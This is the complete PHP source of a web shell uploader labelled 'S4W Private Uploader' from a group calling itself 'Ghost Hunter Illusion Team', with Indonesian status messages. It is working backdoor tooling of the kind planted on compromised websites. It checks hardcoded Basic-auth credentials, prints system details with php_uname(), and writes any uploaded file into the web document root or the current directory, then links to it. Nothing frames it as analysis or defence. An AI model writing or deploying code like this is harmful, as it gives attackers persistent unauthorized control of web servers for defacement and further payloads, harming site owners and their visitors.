S4W Private Uploader

1. <?php
2. // --- pop-up
3.  
4. $user = "S4W";
5.  
6. $pass = "S4W";
7.  
8. if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))
9.  
10. {
11.  
12. header("WWW-Authenticate: Basic realm=\"dvildance was here\"");
13.  
14. header("HTTP/1.0 401 Unauthorized");
15.  
16. exit();
17.  
18. }
19.  
20. // --- php shell
21. echo "S4W Private Uploader - Ghost Hunter Illusion Team <br>";
22. echo "<b>".php_uname()."</b><br>";
23. echo "<form method='post' enctype='multipart/form-data'>
24. <input type='file' name='idx_file'>
25. <input type='submit' name='upload' value='upload'>
26. </form>";
27. $root = $_SERVER['DOCUMENT_ROOT'];
28. $files = $_FILES['idx_file']['name'];
29. $dest = $root.'/'.$files;
30. if(isset($_POST['upload'])) {
31. if(is_writable($root)) {
32. if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
33. $web = "http://".$_SERVER['HTTP_HOST']."/";
34. echo "sukses upload -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
35. } else {
36. echo "gagal upload di document root.";
37. }
38. } else {
39. if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
40. echo "sukses upload <b>$files</b> di folder ini";
41. } else {
42. echo "gagal upload";
43. }
44. }
45. }
46. ?>